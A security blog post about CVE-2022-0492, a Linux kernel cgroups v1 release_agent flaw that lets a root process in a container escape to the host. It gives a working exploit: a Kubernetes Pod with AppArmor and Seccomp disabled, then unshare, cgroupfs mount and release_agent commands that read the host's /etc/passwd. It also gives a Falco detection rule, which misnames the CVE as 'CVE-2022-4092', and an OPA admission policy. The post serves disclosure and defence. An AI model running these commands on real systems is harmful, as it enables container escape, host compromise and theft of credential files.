Linux maintainers disclosed a privilege escalation vulnerability in the Linux Kernel. The vulnerability has been issued a Common Vulnerability and Exposures ID of CVE-2022-0492 and is rated as a High (7.0) severity.
The flaw occurs in cgroups permitting an attacker to escape container environments, and elevate privileges.
The vulnerable code was found in the Linux Kernel’s cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. A patch released fixes this issue in the version kernel 5.17 rc3.
Most container environments have already the security settings enabled by default to prevent container escape. In fact, containers running with SELinux, AppArmor, or Seccomp are protected. That being said, we all know containers run without following the security best practice aren’t unusual and it might expose your environment to serious risks.
In any case, we suggest all Linux users are advised to download and install the latest version of the Kernel.
The CVE-2022-0492 issue
While release_agent escapes are already out there, they require the CAP_SYS_ADMIN capability to escape the container.
CVE-2022-0492 shows us a new technique that can be used to achieve the escape. In particular, we can mount cgroupfs in new users’ namespaces and then edit the release_agent file.
One of the available features of cgroups v1 is the release_agent file. The file allows administrators to configure a “release agent” program that would run upon the termination of a process in the cgroup. When a process dies, the kernel checks whether its cgroups had notify_on_release enabled. If enabled, it spawns the related release_agent binary, running as root.
This means that if you can write to the release_agent file, you can force the kernel into invoking a binary you choose to execute with elevated privileges and take control of the entire system. For these reasons, the release_agent file is owned by root and only a user with root can write to it.
Exploiting CVE-2022-0492
As mentioned before most container environments that follow the security best practices are secure by default. In fact, in order to proceed with the exploitation of the vulnerability, the following conditions must be met:
- Container run as root: since only root can modify the release_agent file this is a mandatory condition to exploit the vulnerability
- AppArmor and SELinux must be disabled: both tools prevent the mounting.
- Seccomp must be disabled: only containers running without that can create a new user namespace
- root cgroup v1: which is the more used version in architecture
Let’s have a look at the exploitation using a Kubernetes Pod. Here is posted the Pod deployed for the test:
apiVersion: v1 kind: Pod metadata: labels: app: apache-httpd name: apache-httpd namespace: apache-httpd annotations: container.apparmor.security.beta.kubernetes.io/apache-httpd: unconfined container.seccomp.security.alpha.kubernetes.io/apache-httpd: unconfined spec: containers: - name: apache-httpd image: darryk/apache2.4.49 ports: - containerPort: 80 hostPort: 80
In particular, the two annotations reported below make sure AppArmor and Seccomp are disabled for the Pod.
- container.apparmor.security.beta.kubernetes.io/apache-httpd: unconfined and
- container.seccomp.security.alpha.kubernetes.io/apache-httpd: unconfined
It is worth noting that if the container is run as privileged all the user-defined measures aren’t applied for the Pod. In this scenario, this new technique is just another one possible along with others already well-known to perform escaping from containers.
securityContext: privileged: true
Once deployed we can execute unshare to create a new user namespace and cgroup namespace. Then we can mount the cgroupfs and write our data to release_agent.
unshare -UrmC bash mkdir /tmp/mountest && mount -t cgroup -o rdma cgroup /tmp/mountest && mkdir /tmp/mountest/x
To trigger the exploit we need also to trigger release_agent invocation by killing all processes in the cgroup. To enable cgroup notifications on the release of the “x” cgroup created we write a 1 to its notify_on_release file.
We also need to edit cgroup release_agent file to execute a /cmd script which will read the host /etc/passwd sensitive file and write the content in the output file directly inside the container. To do it, we’ll grab the container’s path on the host from the /etc/mtab file.
echo 1 > /tmp/mountest/x/notify_on_release host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` echo "$host_path/cmd" > /tmp/mountest/release_agent echo '#!/bin/sh' > /cmd echo "cat /etc/passwd > $host_path/output" >> /cmd chmod a+x /cmd
We can now trigger the attack by spawning a process that immediately ends inside the child cgroup. As shown in the screenshot below we were able to perform the attack and successfully retrieve the host file /etc/passwd from inside the container.
sh -c "echo \$\$ > /tmp/mountest/x/cgroup.procs"
This is just an example to show the successful escaping from the container but other more damaging actions can be done by attackers in order to totally compromise the host.
The impact of CVE-2022-0492
The severity of the flaw is rated High with a score at 7.0. It has a high impact and is easy to exercise by local attackers with root access in the container.
To learn more about how a vulnerability score is calculated, Are Vulnerability Scores Tricking You? Understanding the severity of CVSS and using them effectively
If attackers can exploit the vulnerability, they can leverage this flaw to escape a container environment and gain root privileges on the host system.
As we have seen before, checking if the container environment is vulnerable and also performing the exploitation is fairly easy and straightforward. In addition, similar escaping techniques are already well known and it makes the vulnerability even easier to exploit.
Mitigating CVE-2022-0492
CVE-2022-0492 can be mitigated by installing the Linux Kernel patch.
If patching is not possible, Linux users can also disable unprivileged user namespaces without needing to reboot. WARNING: These commands may affect the host’s ability to run containers.
Run and Response: Event Detection
Using a Runtime detection engine tool like Falco, you can detect attacks that occur in runtime when your containers are already in production. Falco, a CNCF incubating project, can help detect anomalous activities in cloud-native environments. The following Falco rule can help you detect if you are impacted by CVE-2022-0492.
- rule: Linux Cgroup Container Escape Vulnerability (CVE-2022-4092) desc: "This rule detects an attempt to exploit a container escape vulnerability in the Linux Kernel." condition: container.id != "" and proc.name = "unshare" and spawned_process and evt.args contains "mount" and evt.args contains "-o rdma" and evt.args contains "/release_agent" output: "Detect Linux Cgroup Container Escape Vulnerability (CVE-2022-4092) (user=%user.loginname uid=%user.loginuid command=%proc.cmdline args=%proc.args)" priority: CRITICAL tags: [process, mitre_privilege_escalation]
Deploy: Image scanner on admission controller
Implementing image scanning on the admission controller, it is possible to admit only the workload images that are compliant with the scanning policy to run in the cluster.
You can create a validating admission webhook that prevents workload creation and modification. If you have an existing admission policy mechanism (like OPA Gatekeeper), you can create a policy that enforces this restriction.
This component is able to reject images based on names, tags, namespaces, CVE severity level, and so on, using different criteria.
Creating and assigning a policy, the admission controller will evaluate new deployment images, blocking deployment if the security issue is detected.
Using the following OPA rego policy we can make sure that Pod being deployed hasn’t disabled AppArmor or Seccomp.
package kubernetes.admission validateAnnotations(annotation){ some k annotation[k] startswith(k, "container.apparmor.security.beta.kubernetes.io") annotation[k] == "unconfined" } validateAnnotations(annotation){ some k annotation[k] startswith(k, "container.seccomp.security.alpha.kubernetes.io/") annotation[k] == "unconfined" } valueWorkLoadAnnotations(workload){ assign(annotation, workload.annotations[_]); validateAnnotations(annotation) } deny[message] { equal(input.request.kind.kind, "Pod"); assign(workload, input.request.object[_]); valueWorkLoadAnnotations(workload); message := sprintf("Container has %v", [workload.name]) }
Conclusion
Luckily, the vulnerability, CVE-2022-0492, was discovered and already patched but the ease of the exploitability requires putting in place mechanisms to prevent deploying new vulnerable services and be sure we aren’t getting attacks on existent hosts by checking runtime events.
Administrators and users need to keep their systems up to date with the latest security patches. Depending on the environment, patching can be a time-consuming process. Fortunately, open source tools such as Falco and OPA can help track down unpatched systems before attackers can.
In any case, we suggest all Linux users are advised to download and install the latest version of the Kernel.
If you would like to find out more about Falco:
- Get started at Falco.org.
- Check out the Falco project on GitHub.
- Get involved with the Falco community.
- Meet the maintainers on the Falco Slack.
- Follow @falco_org on Twitter.